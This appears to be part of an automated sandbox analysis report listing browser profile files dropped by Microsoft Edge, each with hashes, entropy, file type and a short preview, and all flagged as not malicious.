                                                                                                                                                                                                        SHA1:E9371E2E89D40D1DE9B12C871729E5F6FE10EA36
                                                                                                                                                                                                        SHA-256:5B71CA884B8CD34480F35D66026309B54F7DA1C956A7828C3D94F79A3403E5D1
                                                                                                                                                                                                        SHA-512:F9B2680946CA8194B788AF80D90FEA3172E95CD4BE178473A4904BE3681F244F1AFD3CF80A69DD10CA1EBE2C710ABB60A74BAF3FF559D2702995D19C6FA817F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.445 13fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..2024/11/11-02:11:11.490 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):290
                                                                                                                                                                                                        Entropy (8bit):4.9786626899774555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YHpoNXR8+eqq59Qu6hsDHF4R8H2a9a1TS7PMVKJTnMRK3VY:YHO8sqD6hsBd2cag7E4T3y
                                                                                                                                                                                                        MD5:C6A79B1A87A8A6D8EDE748744384411B
                                                                                                                                                                                                        SHA1:982BFD5F082522AA42A93F19F782B905F04AAFEF
                                                                                                                                                                                                        SHA-256:EE57385776A3CAE860759324BF55B561467A7906C7935EDC14811021FF8EC02A
                                                                                                                                                                                                        SHA-512:FC44456A912219A08BCDA23111D9AB41D56485441A760D465D62C2FFC038EB3ABE389EF7D70A4AF7BF44A7176DA63E05AAD8B8BDBDEEFD5F68C410379FCA2462
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793774","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com"}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                        Entropy (8bit):0.5559092700436605
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TfIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:DIEumQv8m1ccnvS6
                                                                                                                                                                                                        MD5:9E6F2C8B7E0D238554688F45D7AB4C09
                                                                                                                                                                                                        SHA1:4FF260CB36625DCD08F7D9CF670C6FA62C749614
                                                                                                                                                                                                        SHA-256:2DD20F8D185663C951186F4A49ACDB759E0BA2BABC4BF3E18A1E3BF2C003E826
                                                                                                                                                                                                        SHA-512:FDEC30B53625897B705D716E2C982735BD1EECDE8AE72E212DE103E2CEF1D5007DE3F3C1819474B40FE67E7498F89540980773E25110CBC497B0496903EDFF3B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                        Entropy (8bit):3.7273991737283296
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                                                        MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                                                        SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                                                        SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                                                        SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f...............
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):381
                                                                                                                                                                                                        Entropy (8bit):5.169343136208209
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fiTu1CN23oH+TcwtzjqEKj0QM72KLlVUz1fF7SDM+q2PCN23oH+TcwtzjqEv:+1fhYebvqB6L21fFmM+v1YebvqBZFUv
                                                                                                                                                                                                        MD5:71641120C188B9E0E68BAB5C951696E7
                                                                                                                                                                                                        SHA1:EE3E3FB9114C14927CC477A375F5DF4FCE03AA74
                                                                                                                                                                                                        SHA-256:42BE660F2CEC7081170F6A9F7469C50CAD476863525F3E0AD5CBC99385528BE5
                                                                                                                                                                                                        SHA-512:619F926EFCEB33BB18D9FBB9D3223775B7B3D25FDAAD0F84EA9FD80AC0148C84F0F6EAB404CF61B85AC7BCD77E9BB8CFF84E3E521BD01F0491E436704A68B49C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:18.978 13fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage since it was missing..2024/11/11-02:11:19.047 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2095
                                                                                                                                                                                                        Entropy (8bit):6.262060400999663
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:ika17NpmKOTWzdTYRV+ETlht4l9EpmPL1lyTJNliJpmPL1l6TJ3:ika15pROTWzqRAqlP4lepwxlINlqpwx0
                                                                                                                                                                                                        MD5:2B58D5E7B5B1A12E86774716023AA73B
                                                                                                                                                                                                        SHA1:12B50B6EF82FEEE1007FA0CDDC3E8D69C1227A17
                                                                                                                                                                                                        SHA-256:D74E466DE7123F3330219C5CDDFA793BDEEBA21D31E4F4DF6FCDF079805BCBD5
                                                                                                                                                                                                        SHA-512:CE674A767785C88C5A44A35565F6F75DCCA9685CA9B12412A76E228F62395A90611D725DC1D95A00878B9B71EE193EED54EC7324319EE70AEE8BE5BE72A7E93A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:...n'................_mts_schema_descriptor.....F..................F.................3k.)................device_info-GlobalMetadata@.........J..|..... .*.oQxBx3XB+LeESt8u9/Z/2A==2.000340011677ED77.'device_info-md-oQxBx3XB+LeESt8u9/Z/2A==]..O9Y4QRTO52yAtnmJvgDmbxgG0y4=.. .(.0..........8...../@...../J.Fo0ZVE38AhfYdxChT37PSoU+O9U=R..'device_info-dt-oQxBx3XB+LeESt8u9/Z/2A==....oQxBx3XB+LeESt8u9/Z/2A==..To Be Filled By O.E.M..."QChrome WIN 93.0.961.52 (55ddfa3ef850523eea11b31f81b5facebd8934c3) channel(stable)*.93.0.961.52:$d14a0d0c-703a-47a1-a1a4-158e21707eb4@...../J...Z.To Be Filled By O.E.M.b.To Be Filled By O.E.M.h..r..........93.0.961.52$nd i................device_info-GlobalMetadata@.........J..|..... .*.oQxBx3XB+LeESt8u9/Z/2A==2.000340011677ED77.b.Z................'device_info-md-oQxBx3XB+LeESt8u9/Z/2A==}..O9Y4QRTO52yAtnmJvgDmbxgG0y4=.$4825df59-2fc2-4a0b-a2d5-569bbcb87906.. .(.0...../8...../@...../J.Fo0ZVE38AhfYdxChT37PSoU+O9U=..device_info-GlobalMetadata@.........J..|..... .*.oQxBx3X
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                        Entropy (8bit):5.124903720088529
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNrq2PCN23oH+TcwtpIFUt8YUz1fNgZmw+YUz1fNIkwOCN23oH+Tcwta/WLJ:+1fNrv1YebmFUt8Z1fNg/+Z1fNI5eYev
                                                                                                                                                                                                        MD5:3DCEE932E88331AC87803B432F879058
                                                                                                                                                                                                        SHA1:033729E206C9A7AD2F8804CFAC43B38D7E636F1D
                                                                                                                                                                                                        SHA-256:C4DB32542E30CC3B02F236EE73B5874993180DF077B0A9C8698CB5DACD07B791
                                                                                                                                                                                                        SHA-512:9C7F0D3BF08CFFF9BFAEF35DD6325AC1E37DD0FE5A03F6DF5065F5E863CAC42B263016D0A127BEF83806766A336B6285E4B93991607283407CCBE8558222DF7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.191 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-02:11:11.193 1c84 Recovering log #3.2024/11/11-02:11:11.193 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                        Entropy (8bit):5.124903720088529
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNrq2PCN23oH+TcwtpIFUt8YUz1fNgZmw+YUz1fNIkwOCN23oH+Tcwta/WLJ:+1fNrv1YebmFUt8Z1fNg/+Z1fNI5eYev
                                                                                                                                                                                                        MD5:3DCEE932E88331AC87803B432F879058
                                                                                                                                                                                                        SHA1:033729E206C9A7AD2F8804CFAC43B38D7E636F1D
                                                                                                                                                                                                        SHA-256:C4DB32542E30CC3B02F236EE73B5874993180DF077B0A9C8698CB5DACD07B791
                                                                                                                                                                                                        SHA-512:9C7F0D3BF08CFFF9BFAEF35DD6325AC1E37DD0FE5A03F6DF5065F5E863CAC42B263016D0A127BEF83806766A336B6285E4B93991607283407CCBE8558222DF7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.191 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-02:11:11.193 1c84 Recovering log #3.2024/11/11-02:11:11.193 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 8, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):122880
                                                                                                                                                                                                        Entropy (8bit):1.1270069299941012
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sV+4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWUsVusE6:sV+4n/9p/39J6hwNKRmqu+3VusE
                                                                                                                                                                                                        MD5:A0809345D97723CD4173E27957D88904
                                                                                                                                                                                                        SHA1:0F591E66F05A0422B8FC81A5B0AB6099A6C9A226
                                                                                                                                                                                                        SHA-256:3CA1D9E735A21DF7A4C6CC6272F5754B1EBD6DC79AC4E3E61E3562B4E71FE36E
                                                                                                                                                                                                        SHA-512:7BA1223D04BBA47F0D579FD47654773EAEF2A41BC53BC0323F84095F19CE04A0084AB58F999B6A3ED61F33A87B2142E07AF0493F14EAA307985EC2BA44997617
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (12581), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12587
                                                                                                                                                                                                        Entropy (8bit):5.385869058351529
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:s72TNk9jPcAWMdkPHhHcAJY6J8gy7K2jJ+6a9AUoI3+5OjuG8uvhJJ/nhuW:s72TNk9jPcAWMdwhHcVu2+EIJBruW
                                                                                                                                                                                                        MD5:3AB47FF399D557B36CCF2FE189E9AD6C
                                                                                                                                                                                                        SHA1:12B0F4EF2CE968769EE011C18D439A5B2DE76510
                                                                                                                                                                                                        SHA-256:E47A63DDE84357C270071659183D925EC21978DC5E5154256A9D664CCBFBEF4B
                                                                                                                                                                                                        SHA-512:AF8892A73D1753F699764E2AAB5E9031C80FF88A3BA00C5D57158421CA4675681F39F987D696D1F2E7FF2CBB2C9533FE4EEB5D1BCCC47E25E02326753D1CEEE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_info":[],"account_tracker_service_last_update":"13375782671418792","alternate_error_pages":{"backup":true},"anaheim_import":{"auto_imported_details":{"imported_time":"Wed Sep 22 11:33:08 2021\n","profiles":{"browser_name":6,"is_AutoFillFormData_imported":true,"is_Cookies_imported":true,"is_Extensions_imported":true,"is_Favorite_imported":true,"is_History_imported":true,"is_Payments_imported":true,"is_SavedPasswords_imported":true,"is_Settings_imported":true,"source_path":"C:\\Users\\user\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default"}},"imported_default_search_engine":"https://www.bing.com/search?q={searchTerms}&FORM={referrer:source}"},"autocomplete":{"retention_policy_last_version":94},"autofill":{"orphan_rows_removed":true},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_norm
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23881
                                                                                                                                                                                                        Entropy (8bit):5.594521685095174
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:1sfCtTFLKhOObJ+UoAYDCx9TuqZz0VfUCh7xbog/OVKLlg9RCarUqVvnjphp7OID:1eWpL8F1+UoAYDCx9Tuqh0VfUC9xbogA
                                                                                                                                                                                                        MD5:C2E0EA5931304249D8CA173F48D1603E
                                                                                                                                                                                                        SHA1:F83D6E44BE11C56F7558C59AFEA4EFB04175AB4C
                                                                                                                                                                                                        SHA-256:3166D9F796C222DD8E7AFD9A24AF9B244BCCF61EA0AEC3FE5FE769B8D72C05DB
                                                                                                                                                                                                        SHA-512:A07F32C4BF2D0941470C5A2DFD18664D2803391D3BB268420B2C149CB618B345F67F15BC4E15BDEB60DD771BE8A2EB989CAE11A5F7FF28A2D58A6A1F92DBC56A
                                                                                                                                                                                                        Malicious:false
Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"manifest_permissions":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13375782671206215","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","https://*onenote.gov.online.office365.us/*","https://*powerpoint.gov.online.office365.us/*","https://*word-edit.gov.online.office365.us/*","https://
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Rv:1qIFJ
MD5:6752A1D65B201C13B62EA44016EB221F
SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:false
Preview:MANIFEST-000004.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):136
Entropy (8bit):4.42235543602379
Encrypted:false
SSDEEP:3:tRrURVXfUUfUWnvBFz1Zmwv2YURVXfUUfUWn5dFjV87YURVXfUUfUWn5dFjWGv:HUz1fPJFZZmw+YUz1fP5dFjVeYUz1fP/
MD5:C66C5B4886671C48B73EDF8ECE8DF7CC
SHA1:7ECF5E919A208516E9D0EC41AC8C2E7D3C661B9C
SHA-256:05FA683BD712161E678C99A049B8A2CE98FB7C6E57DED8A5F2E99230EFB2AD5F
SHA-512:3C17DFD6F555E8FD31734228047CA37B6988A0BA58DD0699996088EB8885D6292FD4CF32B1B7249FF99339ACC27DF24AB46A0D63F6C9425A254CC25FAC81F3CD
Malicious:false
Preview:2024/11/11-02:11:13.637 268 Recovering log #3.2024/11/11-02:11:13.679 268 Delete type=0 #3.2024/11/11-02:11:13.679 268 Delete type=3 #2.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:MPEG-4 LOAS
Category:dropped
Size (bytes):50
Entropy (8bit):5.028758439731456
Encrypted:false
SSDEEP:3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
MD5:031D6D1E28FE41A9BDCBD8A21DA92DF1
SHA1:38CEE81CB035A60A23D6E045E5D72116F2A58683
SHA-256:B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
SHA-512:E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
Malicious:false
Preview:V........leveldb.BytewiseComparator...#...........
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1262
Entropy (8bit):4.885962682697856
Encrypted:false
SSDEEP:24:Y2esatahVsatJ3aoas2hdsFdJ3RdsxdMHnUsRdMHE3QYhD07nby:Y2eVMhVVfqZs2zs3JzsbMHnUs7MH/Yh7
MD5:2F27B8C0CFED574E3183820517A7D726
SHA1:C28F2029F298843BB913F6BE5809567503798C01
SHA-256:7F56C09AF2036814C9A2DBD0E75CECB6BAE20BB78B200A15C78D09BDDB546579
SHA-512:BA8D0DC388329FCC002287C9177F96F86E12204495FB0A8530A23E25D8F6B9A97371E7D700E9191814B069D0155528C2ACCFC8BAF25925850B30334BC7A7B0DC
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://edge.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://substrate.office.com","supports_spdy":true},{"isolation":[],"server":"https://prod.rewardsplatform.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://edge.activity.windows.com","supports_spdy":true},{"isolation":[],"server":"https://arc.msn.com","supports_spdy":true},{"isolation":[],"server":"https://dns.quad9.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793485","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076230742","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118154},"server":"https://assets.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375876272088042",
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2491
Entropy (8bit):5.024582630822769
Encrypted:false
SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
MD5:B88693A29632D7D9F60A1D83D654034B
SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
Malicious:false
Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):45056
Entropy (8bit):0.6102577073462683
Encrypted:false
SSDEEP:48:TtUYVAKAFXX+mHUETG+s6ksUCaqP+sLKpcEc:4Nsm00ZsTWWseqb
MD5:9D10BBB0EC93648A80853D82EE42B517
SHA1:0A8708E35C25D608544FC145FD5F8A5EBCDFC291
SHA-256:C6D4EA9EB7F5C3DE3ED536FE4E077087A014EFF1D1BD3166D205CC1EEFE0930A
SHA-512:799F616479971E3D08275BEB770043C429D75FD2F72AD9E651316A85786F23129B17EFB525282DCB89EEDC5E012CBA982E4F3623BF2BA7CA886899B4F4849491
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.039491791493707754
Encrypted:false
SSDEEP:3:Gtl5/8rb3DpgAwzllI3l5/8rb3DpgAwzlzlXURa9//DllFlnl/telfl6ll:GtorhgAwzo3orhgAwzzk89XDl/c
MD5:086F42B3190B01E6E1011718B7148438
SHA1:31C2295F095B3CE0B94ABE295EB92ECC22199760
SHA-256:BCE97C5D02820E5F79E2C18F8AFB1619B500C68D5AB100CAA2890239DD370B4E
SHA-512:C1B1A3BBB24BFB76859B4CB3E45A36B3147D2F4D82161CD0297B2B356554A9F771515AF233D395C3F554FF19A7E1BB6BAF925887314F2E0A06750464845C4006
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite Write-Ahead Log, version 3007000
Category:dropped
Size (bytes):16512
Entropy (8bit):0.6242433251251129
Encrypted:false
SSDEEP:24:KgTg+WUtiT/e+s6kxttIWUCh2qd1+sLt9IA:UHUETG+s6kRhUCUqP+sLAA
MD5:D43E4BFB4810A6885CEA217FDC972CB9
SHA1:1D55964AC2E00CEF1873D2BC123F9FC1038D392A
SHA-256:CEF8BEE4B4F06E8D25103B3C41F369C218ECB45E383B1FFBCCEA32FA81B8ADB4
SHA-512:4D2A5D7E2A7E9B18C77ABB9BED2B2573BF2BACA415D2EE6A27E1BFA682432F921F548332C16E612C2E75CF999A096DB2584C4D08B78136960067C6401F024EB9
                                                                                                                                                                                                        Malicious:false
